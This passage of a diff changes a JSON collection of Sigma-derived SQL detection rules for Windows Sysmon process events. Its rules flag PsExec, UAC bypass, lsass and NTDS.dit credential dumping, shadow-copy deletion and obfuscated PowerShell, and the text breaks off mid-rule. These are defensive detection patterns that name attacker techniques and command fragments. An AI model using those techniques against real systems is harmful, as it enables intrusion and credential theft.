NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "status": "experimental", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1204" ], "falsepositives": [ - "Unlikely" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", - "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "status": "experimental", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", - "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE 